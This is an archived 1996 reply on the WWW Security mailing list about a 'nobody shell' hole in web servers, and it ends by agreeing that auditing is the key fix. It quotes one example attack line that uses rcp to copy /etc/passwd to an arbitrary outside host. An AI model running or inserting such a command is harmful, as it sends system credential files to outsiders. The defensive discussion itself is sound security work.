[3690] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (John Stewart)
Wed Dec 4 14:33:19 1996
To: Eli Beker <beker@ibm.net.il>
cc: www-security@ns2.rutgers.edu, John Stewart <jns@cisco.com>,
Andrea Di Fabio <fabio@cs.odu.edu>,
IBM Israel - Internet Unix Support Team <moked@ibm.net.il>
In-reply-to: Your message of "Wed, 04 Dec 1996 11:41:05 +0200."
<Pine.A32.3.95-heb-2.07.961204113005.27742J-100000@rex.ibm.net.il>
Date: Wed, 04 Dec 1996 09:03:40 -0800
From: John Stewart <jns@cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu

-> Yes, but what about:
->
-> system("/bin/rcp /etc/passwd Any_Host: &");

No argument from me. With my first answer, I addressed (to some
degree) the problem first seen. With my other two, I addressed the
problem as a whole :)

-> > 3. Audit.
-> >
-> Auditing, Auditing, Auditing, That's the solution key.

Absolutely.

--J
John Stewart (jns@cisco.com) | | Phone: +1.408.526.8499
Advanced Customer Systems ||| ||| FAX: +1.408.232.2399
Cisco Systems, Inc. .:|||||:..:|||||:. http://www.employees.org/~jns
Friends of Randal Schwartz: http://www.lightlink.com/fors/